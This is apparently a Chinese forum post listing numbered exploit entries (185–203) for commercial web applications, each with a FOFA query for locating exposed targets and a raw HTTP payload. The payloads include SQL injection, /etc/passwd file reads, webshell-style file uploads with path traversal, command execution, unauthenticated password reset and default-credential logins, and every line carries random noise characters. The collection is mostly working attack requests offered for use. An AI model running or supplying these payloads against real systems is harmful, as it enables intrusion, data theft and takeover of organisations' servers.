; G! V5 O; N0 [# ^. |
0 Q( L: W( v/ M. @
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')8 j. y {3 `6 g9 a- Z; @; k/ ?- d2 @9 y
9 i" f& B, x8 q' P g' V
$ k/ Q/ j5 o: u2 ?1 w
185. 瑞友天翼应用虚拟化系统SQL注入, |& s( ]+ J$ e
version < 7.0.5.1
3 O3 K5 s9 t* Y0 k* @2 zFOFA:app="REALOR-天翼应用虚拟化系统"
3 |8 _% A! A5 K9 SGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1: m! D2 E+ Q7 U. a
Host: host
% u4 Z; i/ t5 H$ W1 Z
1 d+ f, ?' I `4 {$ p; ^6 V4 b6 Y7 Q# F# F* G
186. F-logic DataCube3 SQL注入
) T) W' U) l, d( s7 p% X. wCVE-2024-31750
) F* W4 M( o7 }* y9 e8 m' \* k( MF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
0 V3 a5 @# a& {. m' Z! A6 x1 ?: n/ v1 RFOFA:title=="DataCube3"9 x" j$ _2 j4 D
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
2 I2 R- {6 _6 qHost: your-ip7 A. z I8 b( E& ^4 Z5 v; e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.09 n6 a6 @+ m. R$ q9 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8& n6 W* b3 }4 j4 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 B1 t/ |# D B9 K5 T
Accept-Encoding: gzip, deflate1 R6 z e& y* q' B) ~ m
Connection: close3 Y2 s3 H5 f5 p( Y* b
Content-Type: application/x-www-form-urlencoded
4 b6 i0 G6 ? p; Q! b
( X. n0 D5 [" ]0 W7 M5 ~, z- G. Yreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14504 O) m: _! M4 D
: Y, B2 |9 Q2 z8 e- V% D8 G4 c4 A0 G, V% r2 G$ F: u h$ ]8 e1 t% E' b6 s
187. Mura CMS processAsyncObject SQL注入
- d, N5 w6 Y5 U/ \1 J% k7 t! I% JCVE-2024-32640
) v; r* A) m5 Q) x& i! VFOFA:"Mura CMS"
4 V; [9 ]$ }& S1 k( {2 XPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.10 w! i" l# N# r" A& V
Host: your-ip! Q+ A2 P E% S0 f% s
Content-Type: application/x-www-form-urlencoded
2 Q2 ^1 M" g+ x! x" D( l) c2 P% K0 k
# d2 Y8 f2 y( y3 Y* g& n+ }7 ]6 G( b) b3 y% `
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1: @! J; G+ F% x7 ?
- {6 y9 ~) y8 N! b# C
" R0 L) i" m$ K' Z1 I188. 叁体-佳会视频会议 attachment 任意文件读取0 a; v; v( |- X7 A( n, k0 Y
version <= 3.9.7% l- U. K0 }* N7 D2 B( s' z
FOFA:body="/system/get_rtc_user_defined_info?site_id"
2 ?" f) }! |3 PGET /attachment?file=/etc/passwd HTTP/1.1' A' N( ?8 ?1 ?' l' I I$ ?
Host: your-ip7 t- ^) l) P; M% H9 [+ q. ]" B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% A5 v0 v6 L2 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* ?3 Q. F$ s) J$ T4 q7 C8 p
Accept-Encoding: gzip, deflate
- @0 ]7 H& H Y3 D# }# f: T+ M0 L" EAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' v* t* ]! l2 B0 Y; W- S/ m/ NConnection: close- ^& I$ j4 Z2 l' j( z9 ~# p
0 M- H3 W) y2 M- y( T" h2 q, x5 l& S
, ?, C9 \8 v( b( e% }4 ~189. 蓝网科技临床浏览系统 deleteStudy SQL注入
# G3 _$ ` n$ T I6 D4 ~FOFA:app="LANWON-临床浏览系统"; G" ^- ]' X: I) A5 W
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
3 S) U& ]/ U4 a. D( J! E* Z% eHost: your-ip9 s; N2 `, N$ X: J5 v0 U7 r
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 [, B( ^/ ?' M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 X |8 F ]: o* e9 T5 P
Accept-Encoding: gzip, deflate+ _) K) o: c2 |6 p" q/ G L
Accept-Language: zh-CN,zh;q=0.9
: p4 T0 ]6 r9 w# V/ P2 u2 dConnection: close7 {3 C4 r. r, a& e0 Q
3 n" B+ Z- G, O c* V* [5 Z( s9 P3 F& W3 d& @
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 ~ D( a6 |* _) B2 OFOFA:title=="短视频矩阵营销系统"4 c9 j6 S9 N) I4 F! ?
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
8 `# O4 ^# a! \5 u( D2 tHost: your-ip
8 M/ h/ n3 u0 v5 g, r9 [$ e- VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
# _/ d5 j" V, }8 ]# ?' \# {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; @- ]- t# _1 A/ t7 l& z
Content-Type: application/x-www-form-urlencoded2 X$ A1 c0 G3 Y, U& W
Accept-Encoding: gzip, deflate0 D2 u" g' A1 D" B4 m
Accept-Language: zh-CN,zh;q=0.9
\" W; ]. s$ l% Y6 @) E
$ r b! ?1 i" _5 ^8 z3 Ypoi=file:///etc/passwd" O" t4 R7 P0 ]$ _0 i3 W$ t
7 G) C7 g5 P1 }' Q1 v/ x
( |/ J- w4 I# }# F" p( s# D! M191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入% k- Z6 Z0 a/ E' p) I) }- ~
FOFA:body="/CDGServer3/index.jsp"% G# V, c( H( l
POST /CDGServer3/js/../NavigationAjax HTTP/1.16 k" I4 h. I- J* i) ]& \) p
Host: your-ip8 a' G4 i1 g) N2 X: i9 ^9 J. K2 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ J& I3 G5 q# _$ mContent-Type: application/x-www-form-urlencoded2 |! X( u' T1 K$ a4 Z. H) K/ l
" E$ @6 ?! I7 _7 Y ~7 s; `7 @4 a
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
I7 r4 Q; ]% r/ o. p+ T& ?, F d& f4 H5 s
" r& d& n2 m; T! n/ d, J
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
. p5 v# z" V6 f' W4 P2 b8 uFOFA:title="用户登录_富通天下外贸ERP"4 P! z b$ R7 i* Z
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
6 }1 z [/ E8 G" wHost: your-ip6 |2 b$ ~$ i( i, [/ w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- X, j" @, Q0 x Z0 m- [! b& dContent-Type: application/x-www-form-urlencoded
. R3 C: j2 ?4 I" c( u; v4 O; x: e8 A, A. F$ \
( ~6 b' ~+ Y3 ]$ C$ J<% @ webhandler language="C#" class="AverageHandler" %>
- e. }7 F9 _$ r; F0 P9 V1 Gusing System;
& [4 z) _: l- C; a6 Y/ U! Busing System.Web;/ L6 |2 O' S* d, \ q$ t8 k, C! M% o
public class AverageHandler : IHttpHandler0 c# J' ?9 I; V5 s5 Z2 V
{% ]8 O, k/ R4 s5 }
public bool IsReusable3 ~2 h4 F0 C: M/ Y( t
{ get { return true; } }
" W1 E4 G. P4 m4 Z8 Lpublic void ProcessRequest(HttpContext ctx)
8 h3 _5 M8 o) g6 L{
# R8 V2 o; N0 ~+ C# U- Octx.Response.Write("test");
' z; p0 u1 z' r. ?# U: Z}% c* j7 y% s( W2 J: F- b
}6 n$ l" H3 g7 S7 h
% d, K: ]2 a( C3 p5 P+ u7 Z- t) D" p- o; w+ `. f
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行+ u; H% [! _ n
FOFA:body="山石云鉴主机安全管理系统"
! K6 }0 c6 ~& r& A/ RGET /master/ajaxActions/getTokenAction.php HTTP/1.1
' j' d6 @1 A8 @; W! dHost:
; H& h" l" \7 @! ?; }+ ICookie: PHPSESSID=2333333333333;0 v* [9 U" _( F
Content-Type: application/x-www-form-urlencoded
8 e$ f8 p* a' c( x. l pUser-Agent: Mozilla/5.0
$ s5 i8 g5 y- v3 r. i& x: D8 |2 G K" `
+ Y$ G4 i, I8 H! Y
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
9 b8 n6 v9 C+ Q D, O5 OHost:! A0 f9 a& ?/ C2 i$ F u
User-Agent: Mozilla/5.01 \6 q/ O$ S8 R y' |' ]9 F
Accept-Encoding: gzip, deflate* o, G+ g; S- k& m
Accept: */*4 p' l1 [) q8 J3 X J! |* N
Connection: close2 O# y4 `* U; `( b8 M/ y- x3 R- B. x
Cookie: PHPSESSID=2333333333333;* T( a! ?2 a% P9 U6 d( e; m
Content-Type: application/x-www-form-urlencoded! `5 p7 Z1 s% V
Content-Length: 84
3 h% p. Q5 `9 n) I I( Z+ e
% A% s) ?7 Z% g& kparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
p+ Q5 w9 Z! G5 g x
8 c$ h$ [% i; T" O3 a0 H8 v( g) g) e$ @$ [5 b. x b" w
GET /master/img/config HTTP/1.1
0 n* [' K ~7 ]8 jHost:
7 ^% i, y+ z/ Y9 v. y& k$ ^User-Agent: Mozilla/5.0+ Z+ W% _. Q+ w0 M. e
9 {1 O7 ]; y, K! ]& Y% `6 ]1 D3 c/ G/ Y1 o
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
( x- c5 U8 l; W) s' s( e6 @$ \, dFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
$ A: J' j$ [3 ?% w
- c4 K4 K/ X( P& YPOST /servlet/uploadAttachmentServlet HTTP/1.1: V* N2 N) z n z$ @6 W
Host: host
0 w2 [& g! q dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36' n4 N- M2 J5 G5 S4 f! `3 p5 L1 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( M4 E, a6 y! k& Q( B- O# T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% b! G+ C( j/ A* O7 D
Accept-Encoding: gzip, deflate4 z/ z/ O1 F, \% H6 A0 m5 N
Connection: close6 F; d0 Q1 u4 I; Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ ?# w: C0 o3 E w' X u------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 g* L5 c+ d6 A. U' ~1 w% v$ h- _" u5 S& |$ }
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
7 w- T' a' }1 \Content-Type: text/plain* h3 H' C3 B0 X/ A0 ?2 H
<% out.println("hello");%>
0 L: C; d6 T0 s6 x# e- V& Z2 O4 c------WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ w3 D7 Q. ~ i' _' Q( {/ O5 gContent-Disposition: form-data; name="json"
# ]2 I( R7 |$ ?% x' E! g ^ ^ {"iq":{"query":{"UpdateType":"mail"}}}3 ^; H2 M; i/ F3 v1 {
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
3 }# {# V! T: Z5 s# M* g& j! Y; M( E I/ R2 d1 ^8 ~
# n* ~+ c! T! ~) V0 |* n" b4 p
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
" R0 F) t+ {4 G; v, H- tFOFA:title=="飞鱼星企业级智能上网行为管理系统* l* w$ _% D; C% o, f9 g
POST /send_order.cgi?parameter=operation HTTP/1.1
# H9 T5 R: ?' q. o( q1 i1 i4 C4 uHost: 127.0.0.1
/ g% N" J6 o) Q. y* ?Pragma: no-cache V+ a- w- g" X% \3 F/ C1 E, x k
Cache-Control: no-cache
$ U& ]5 O+ L Q% q! ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 O' M, c, N" M: MAccept: */*# [1 C t+ k* j+ o4 W9 Q, O: i7 ~$ |
Accept-Encoding: gzip, deflate- F/ ]; Y6 Y8 H( \* l+ c2 H7 T1 |
Accept-Language: zh-CN,zh;q=0.90 ~ p$ Z6 M. ~- p% c: w
Connection: close
0 X. b" v4 r3 O0 |( L0 DContent-Type: application/x-www-form-urlencoded7 ~7 Z: u( K: X5 g. L$ k0 e" h
Content-Length: 68
7 X) l8 W& {7 q/ B8 } }9 e/ V% v, n1 C8 P7 o+ V
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}1 i! r* D6 E& N4 h; M0 n! S
" Z9 A# j* h! h! U y9 x8 w
" U; [* U" {0 A% k, B3 ?0 D% S
196. 河南省风速科技统一认证平台密码重置
2 f, G! y+ ]; \, b: Q1 m2 b% W1 |FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
' F/ t% _, E) l+ ^1 p9 jPOST /cas/userCtl/resetPasswordBySuper HTTP/1.15 Q( s9 ^! F4 ]* w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 `1 Q# u2 t1 `* x' A# M1 CContent-Type: application/json;charset=UTF-8( q' [/ R$ C- x4 H( v6 y) f4 B
X-Requested-With: XMLHttpRequest
% ]/ d# r( m& k8 H4 RHost:" `) J2 a# o1 k3 i2 J0 U( g/ V
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
2 e% h/ H# E- K# ~# kContent-Length: 45
1 r, F) f! s% s6 Q( k) r7 cConnection: close
' Z$ o* q* H6 T* ? ]
* e4 P* X; P4 ~/ g/ Q{"xgh":"test","newPass":"test666","email":""}, N8 g. K6 l1 @+ E
, e t* P0 Z' x* }
# o$ j. k6 A$ B$ r' S
$ D& V) u' K; j7 a7 q197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
6 }: _4 X( `1 ?6 n( Z2 ]; b3 S* yFOFA:app="浙大恩特客户资源管理系统"" p, o" s& A+ {: v' @7 j& S
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1- m6 D9 m1 n5 S6 ]. q8 M6 L7 q
Host:: l/ c: T2 Q& {2 C c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.366 i& P i, z9 B3 ~! s$ T4 z
Accept-Encoding: gzip, deflate, Y8 i8 _9 Q- t3 H% A
Connection: close9 Q. Q6 O1 d( M
1 p- R5 k* ~' P, {" G* N7 e- a3 ]
S: i. }1 X- |# `% }6 g v% v* s9 s! Q, q198. 阿里云盘 WebDAV 命令注入5 Y- T' R* {# Q( W
CVE-2024-29640
) |6 |- S) O4 H& @GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
6 q3 |4 v2 n$ U+ cCookie: sysauth=41273cb2cffef0bb5d0653592624cf645 A( G) g# t! Y/ p
Accept: */*' r0 \: Y' ~0 @1 r7 y( }6 H
Accept-Encoding: gzip, deflate- v K4 ]( l2 d7 x, T, l4 k0 D% R, f3 O m
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6# U7 i2 `1 h1 S4 C: x
Connection: close
! s- v! H7 p2 U. F6 T3 v) Z9 G3 @5 {, {6 y
* C/ h% x1 q( S199. cockpit系统assetsmanager_upload接口 文件上传- J5 z- q/ Z3 t; r( W
6 q' Y) [( M. J7 a# f! w& A2 ^/ l
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:% t O$ s, U+ g1 m! ~& {# `5 y
GET /auth/login?to=/ HTTP/1.1
0 M/ r/ b/ [% u5 T) g6 X5 L, a/ b+ i$ B
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
; q$ G! d, t% H& n4 k% B; F9 t
* I0 S" m, g/ C0 z6 x! z4 u8 p1 f4 J) k2.使用刚才上一步获取到的jwt获取cookie:/ j& M! g2 y; ^6 p: m
$ c0 Z% `* g# H- o* s" q; APOST /auth/check HTTP/1.14 U6 W$ V3 e9 W+ Q/ q% @3 W% L
Content-Type: application/json3 G1 `7 T! j/ c8 g" R
) C8 e: }2 z0 ?
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. {( V3 Y, ?( m1 H
- W! X' }; H$ ^. K响应:200,返回值:$ L& h5 `# }8 \9 t. h2 o8 n
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
# t8 v) h% p) T: PFofa:title="Authenticate Please!"2 d' z8 C2 U7 |* x2 x
POST /assetsmanager/upload HTTP/1.10 S! P% o1 ? h& O
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb31 Y$ ?9 a3 H! T W- I1 |- A! H
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92, ]6 k* L. S6 z3 ^
* p8 l8 ^+ q# t- r. o3 l& z
-----------------------------36D28FBc36bd6feE7Fb3* Q, E3 O+ H5 s: n, J7 d
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
% D! S+ }) g/ R9 \1 BContent-Type: text/php" ^+ v9 m# ]0 ^: T! |3 P6 @& B3 ]; g
7 a) Z; b; Q) n
<?php echo "tttt";unlink(__FILE__);?>
; ~4 \1 z' \5 i" H2 l-----------------------------36D28FBc36bd6feE7Fb3
4 j. B0 L9 k( N% e$ D" D! T# M+ tContent-Disposition: form-data; name="folder"
$ g% H/ ]: B& W' C# F. A4 s1 H! [
2 _- w3 X: t$ s/ M-----------------------------36D28FBc36bd6feE7Fb3--
/ }9 q1 P% F3 f
6 t( b% @$ I1 x* B5 `7 Q; f: B, t8 u' B' y
/storage/uploads/tttt.php
; t4 V' g$ ^9 o, R5 ^0 r* K
2 M6 M0 B& m$ {4 c$ A200. SeaCMS海洋影视管理系统dmku SQL注入
1 `) [7 R+ M1 d# W- |; C8 SFOFA:app="海洋CMS"
) p/ N4 P& f9 F8 F% qGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.10 n, l' _9 F! q3 B3 D
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
) X6 w4 p# t) J0 [7 ?# B$ CUpgrade-Insecure-Requests: 1
: O: \. {& s U& C- v" b4 MCache-Control: max-age=0
8 l) Q; s) ^5 c# J! d* u" K7 p/ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ l5 H8 m0 z x: B+ N3 n! \. cAccept-Encoding: gzip, deflate
/ v; }9 h% R! R, U; xAccept-Language: zh-CN,zh;q=0.9
! t; T% B* R' V/ U( F8 z! F
: K5 x5 B# V+ w, n6 @8 m
5 d# a3 Q4 \1 [( X; M201. 方正全媒体新闻采编系统 binary SQL注入) ?! m) H/ i5 H5 B7 t# v
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
1 m6 b. l& n( M' q. K: CPOST /newsedit/newsplan/task/binary.do HTTP/1.1* ?" [/ |. x, b H& W2 C2 A
Content-Type: application/x-www-form-urlencoded, m# Y* z8 T6 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 K, @+ y- F& @* b/ Y+ DAccept-Encoding: gzip, deflate
3 Y7 e9 M5 S7 b' n/ k' U1 aAccept-Language: zh-CN,zh;q=0.9
+ G) E7 x ]% `. l) L1 JConnection: close
( w6 q7 X8 S1 r- ]3 ^% G6 m3 u- @# C- X6 t+ @
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=19 y0 |# ]1 t E' P* ^# t" q
/ L0 d: F3 m" `0 \0 L( ^* U
, [* ?2 X$ _6 t202. 微擎系统 AccountEdit任意文件上传
# l, I q+ \. ]; ?, TFOFA:body="/Widgets/WidgetCollection/"8 U; }) Q9 p# @& E& Q+ T! K* [. }: |. v
获取__VIEWSTATE和__EVENTVALIDATION值
& f1 v3 @* O+ K4 bGET /User/AccountEdit.aspx HTTP/1.13 X9 @; p( k; K: A' |
Host: 滑板人之家
& e- G L/ w, ~ x& n lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
% j" A: X7 u& @3 Z% U# g4 pContent-Length: 0/ H0 c- D5 _ S* X
6 T. K. y% `$ v) E: r& Z j: ?8 u: d* f2 Y
替换__VIEWSTATE和__EVENTVALIDATION值2 B! s4 H# F, w K/ ^4 ^: R, b
POST /User/AccountEdit.aspx HTTP/1.1/ u9 u& X; }& m% L* [
Accept-Encoding: gzip, deflate, br5 u+ p; E9 ?5 j( h1 x- [
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
0 E- m: b8 M6 b& p
- {( x% X9 ~& A4 ]- |: i( f2 J-----------------------------786435874t385875938657365873465673587356877 n% n+ ~# z" \, ]1 f
Content-Disposition: form-data; name="__VIEWSTATE"1 k& W3 t8 C' b6 J* _
/ z) @6 P! \3 m9 a
__VIEWSTATE
6 ?5 _0 ?7 P6 D2 s-----------------------------786435874t38587593865736587346567358735687
) s4 p& I4 b# K$ J1 |. R ?Content-Disposition: form-data; name="__EVENTVALIDATION"
2 ]3 W. p9 y' J2 K9 g5 P$ J" N; U! j' o8 C: j5 `4 Q
__EVENTVALIDATION
, _2 g4 \ ?# M6 _+ e-----------------------------786435874t385875938657365873465673587356873 u. M) G) h+ o0 u9 n; u
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"" b% b0 f8 ^/ k" X# h" o
Content-Type: text/plain
3 ^# Q6 d+ o5 w* k' D1 v C6 k$ T. |' B( Y5 H7 i
Hello World!0 M4 ? |8 F4 A6 y/ u( K* U3 t e
-----------------------------786435874t38587593865736587346567358735687
0 ?" Q3 ]7 O5 X+ T2 X8 Z2 lContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
M0 C- Q- Z- N9 D1 k( {2 v1 w& |( k
上传图片; y9 k& W* @- r5 B* S+ k9 H
-----------------------------786435874t38587593865736587346567358735687
; v% z1 Q& D. Y t) ]; N, \/ NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"& s8 C/ u0 B0 R% g! j w
K* m+ W6 a t4 f; e
0 e2 U0 o8 S" @* X( l0 | o# f f-----------------------------786435874t385875938657365873465673587356874 J1 K4 p- w- M/ e/ i+ ?
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
' X" n2 |7 X4 w3 N
+ x! e6 J2 {+ E) K0 F8 Y- Z- ?* n- n/ H8 z! f* z5 D' b6 g
-----------------------------786435874t38587593865736587346567358735687--8 M# L3 k/ @6 x
0 a' U; L1 Y2 s: g+ k$ g9 ^- n8 H! @) G+ g3 d# C
/_data/Uploads/1123.txt
# S2 R+ e. [% E# r- P7 _* Y8 i i/ ?# j3 T/ O4 } ?$ c
203. 红海云EHR PtFjk 文件上传
* _" Y' K; G6 f1 i0 }FOFA:body="RedseaPlatform"; X! ~% _7 k* V, s
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
; a) D: g8 v) GHost: x.x.x.x
: g; z: G- L6 c6 j U8 R! cAccept-Encoding: gzip3 _. H1 S- B8 o" {7 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, E9 ~% X# w$ Q4 N; O/ G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
# f) }( ]4 n! CContent-Length: 210' K! W: s& P. t% q
! H2 w8 ^" P$ k- _
------WebKitFormBoundaryt7WbDl1tXogoZys4- F5 L0 m/ S2 [ B9 ~
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"- g8 a) W" {3 C
Content-Type:image/jpeg
: ]# E3 W9 a! X6 ~; w# r1 h& f7 `2 k6 b; W. Q9 X$ }. Z
<% out.print("hello,eHR");%>; \+ N0 j6 P6 |6 L8 d) }
------WebKitFormBoundaryt7WbDl1tXogoZys4--& U8 y8 S: B' L$ b( w5 d
4 F5 S' Z3 F& ]4 x- d G# a2 e
5 n* |, D! c3 U! M, O! I+ E4 J6 _& w) z& O9 L7 ~
/ M! x6 M4 L! I6 |' H# X. i# s
: y) p# h% G+ t( B8 r# `
- R$ I" N; ], h& j8 S% \ |
发表于 2024-6-5 14:31:29
收藏
支持
反对